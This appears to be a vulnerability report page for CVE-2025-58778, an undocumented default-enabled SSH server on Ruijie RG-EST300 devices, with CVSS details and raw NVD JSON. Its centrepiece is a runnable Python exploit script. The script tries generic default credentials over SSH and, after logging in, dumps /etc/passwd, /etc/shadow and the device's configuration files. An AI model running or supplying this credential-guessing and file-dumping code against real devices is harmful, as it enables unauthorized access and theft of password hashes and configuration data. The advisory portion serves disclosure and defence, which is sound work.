Security Vulnerability Report
CVE-2025-58778 CVSS 7.2 HIGH

CVE-2025-58778

Published: 2025-10-16 06:15:38
Last Modified: 2026-04-15 00:35:42

Description

Multiple versions of RG-EST300 provided by Ruijie Networks provide SSH server functionality. It is not documented in the manual, and enabled in the initial configuration. Anyone with the knowledge of the related credentials can log in to the affected device, leading to information disclosure, altering the system configurations, or causing a denial of service (DoS) condition.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ruijie RG-EST300 (multiple versions)
All affected firmware versions of the Ruijie RG-EST300 series

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
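# CVE-2025-58778 - Ruijie RG-EST300 undocumented SSH service check
#
# Checks whether a device exposes the undocumented SSH server and whether a
# candidate username/password pair is accepted on it.
#
# NOTE(review): the advisory text only speaks of "the related credentials" and
# does not publish them. The pairs tried at the bottom of this file are generic
# guesses, so a run that ends in "Authentication failed" does not show that a
# device is unaffected. For exposure assessment the reachable SSH banner is the
# finding that matters; the remedy is to keep the service unreachable from
# untrusted networks.
import socket
import sys
import time

import paramiko


def check_ssh_service(host, port=22, timeout=5):
    """Report whether an SSH server answers on host:port.

    Opens a TCP connection, reads up to 1024 bytes and looks for ``SSH`` in
    what the peer sent.

    Args:
        host: Address of the device to probe.
        port: TCP port to connect to.
        timeout: Socket timeout in seconds, applied to connect and receive.

    Returns:
        True if the received bytes contain ``SSH``; False otherwise, including
        on any connection error.
    """
    try:
        # The context manager closes the socket on the error paths too; the
        # original only closed it after a successful recv().
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            sock.connect((host, port))
            banner = sock.recv(1024)
    except Exception as e:
        print(f"[-] Error checking SSH service: {e}")
        return False

    if b'SSH' in banner:
        print(f"[+] SSH service detected on {host}:{port}")
        # errors="replace": a banner with non-UTF-8 bytes must not turn a
        # positive detection into an exception and a False result.
        print(f"[+] Banner: {banner.decode(errors='replace').strip()}")
        return True
    return False


def exploit_ssh_access(host, port, username, password):
    """Try one username/password pair over SSH and, on success, run the
    information-gathering commands listed in the body.

    Args:
        host: Address of the device.
        port: SSH port.
        username: Account name to try.
        password: Password to try.

    Returns:
        True if the login succeeded and the commands were run; False on an
        authentication failure or any other error.
    """
    client = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the peer presents, so a
    # successful login says nothing about which device actually answered.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        print(f"[*] Attempting SSH login to {host}:{port} with {username}:{password}")
        client.connect(host, port=port, username=username, password=password, timeout=10)
        print("[+] Login successful! Executing system commands...")

        # Execute information gathering commands.
        # The output includes account and configuration data (among them the
        # shadow file), so the console log of a run is itself sensitive.
        commands = [
            'cat /etc/passwd',
            'cat /etc/shadow',
            'ifconfig',
            'cat /proc/version',
            'find / -name "*.conf" 2>/dev/null',
            'cat /etc/config/* 2>/dev/null'
        ]
        for cmd in commands:
            print(f"\n[*] Executing: {cmd}")
            stdin, stdout, stderr = client.exec_command(cmd)
            # errors="replace": binary bytes in a command's output must not
            # make an accepted login get reported as a failure.
            output = stdout.read().decode(errors="replace")
            # Only the first 500 characters of each command's output are shown.
            print(output[:500])
        return True
    except paramiko.AuthenticationException:
        print("[-] Authentication failed")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    finally:
        # Release the transport on every path, not only after success.
        client.close()


if __name__ == "__main__":
    target_host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    ssh_port = 22

    # Generic username/password guesses. NOTE(review): nothing in the advisory
    # text confirms that any of these is the credential it refers to.
    credentials = [
        ("admin", "admin"),
        ("admin", "ruijie"),
        ("admin", "password"),
        ("root", "root"),
        ("admin", ""),
    ]

    print(f"[*] Targeting Ruijie RG-EST300 device at {target_host}")
    if check_ssh_service(target_host, ssh_port):
        for username, password in credentials:
            if exploit_ssh_access(target_host, ssh_port, username, password):
                print(f"\n[!] Successfully exploited CVE-2025-58778 with credentials: {username}/{password}")
                break
            # One-second pause between attempts.
            time.sleep(1)
    else:
        print("[-] SSH service not detected on target")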

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58778", "sourceIdentifier": "[email protected]", "published": "2025-10-16T06:15:37.533", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Multiple versions of RG-EST300 provided by Ruijie Networks provide SSH server functionality. It is not documented in the manual, and enabled in the initial configuration. Anyone with the knowledge of the related credentials can log in to the affected device, leading to information disclosure, altering the system configurations, or causing a denial of service (DoS) condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-912"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN72648885/", "source": "[email protected]"}, {"url": "https://www.ruijie.com.cn/gy/xw-aqtg-gw/929848/", "source": "[email protected]"}, {"url": "https://www.ruijie.com/en-global/support/productLifecycle", "source": "[email protected]"}]}}